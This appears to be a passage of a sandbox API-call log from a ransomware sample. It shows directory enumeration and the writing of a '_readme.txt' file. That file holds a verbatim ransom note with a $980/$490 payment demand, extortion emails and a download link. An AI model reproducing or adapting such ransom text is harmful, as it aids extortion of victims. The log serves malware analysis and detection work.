(HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32fed30 [0200.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32fed58 [0200.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32fed80 [0200.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32feda8 [0200.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32fedd0 [0200.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32fedf8 [0200.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32fee20 [0200.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32fee48 [0200.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32fee70 [0200.697] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0200.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0200.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9200 [0200.697] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0200.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0200.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9228 [0200.697] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0200.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0200.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9318 [0200.697] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0200.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0200.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92c8 [0200.698] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0200.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0200.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32fece0 [0200.698] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0200.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0200.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x310) returned 0x3310a28 [0200.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32fecb8 [0200.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32fec90 [0200.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32fec68 [0200.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32fec40 [0200.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32fec18 [0200.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32febf0 [0200.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32febc8 [0200.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32fee98 [0200.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32feec0 [0200.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32feee8 [0200.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32fef10 [0200.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32fef38 [0200.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32fef60 [0200.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32fef88 [0200.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32fefb0 [0200.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32fefd8 [0200.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32ff000 [0200.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32ff028 [0200.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32ff050 [0200.698] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0200.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0200.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92c8 [0200.699] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0200.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0200.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9318 [0200.699] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0200.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0200.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9228 [0200.699] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0200.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0200.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9200 [0200.699] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0200.699] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0200.699] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0200.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0200.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.699] PathFindFileNameW (pszPath="C:\\Config.Msi\\") returned="Config.Msi\\" [0200.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.699] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0200.699] PathFindFileNameW (pszPath="") returned="" [0200.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0200.699] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0200.700] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0200.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x336f4d0 [0200.700] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x336f4d0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0200.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3b65058 [0200.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0200.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0200.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0200.700] FreeLibrary (hLibModule=0x75020000) returned 1 [0200.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0200.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f4d0 | out: hHeap=0x2c0000) returned 1 [0200.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0200.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0200.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x81c) returned 0x3b15070 [0200.700] PathAppendW (in: pszPath="C:\\Config.Msi\\", pMore="_readme.txt" | out: pszPath="C:\\Config.Msi\\_readme.txt") returned 1 [0200.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b158f8 [0200.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0200.700] PathFileExistsW (pszPath="C:\\Config.Msi\\_readme.txt") returned 0 [0200.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3b65058 [0200.701] lstrcpyW (in: lpString1=0x3b65058, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0200.701] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0200.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b16180 [0200.701] CreateFileW (lpFileName="C:\\Config.Msi\\_readme.txt" (normalized: "c:\\config.msi\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0200.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b16180 | out: hHeap=0x2c0000) returned 1 [0200.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0200.701] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0xffffffff [0200.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0200.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0200.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced80 [0200.701] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0200.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32cecf0 [0200.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32cecf0 | out: hHeap=0x2c0000) returned 1 [0200.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32cecf0 [0200.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32cecf0 | out: hHeap=0x2c0000) returned 1 [0200.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32cecf0 [0200.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32cecf0 | out: hHeap=0x2c0000) returned 1 [0200.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32cecf0 [0200.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32cecf0 | out: hHeap=0x2c0000) returned 1 [0200.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32cecf0 [0200.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32cecf0 | out: hHeap=0x2c0000) returned 1 [0200.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32cecf0 [0200.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32cecf0 | out: hHeap=0x2c0000) returned 1 [0200.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced80 | out: hHeap=0x2c0000) returned 1 [0200.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.702] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0200.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 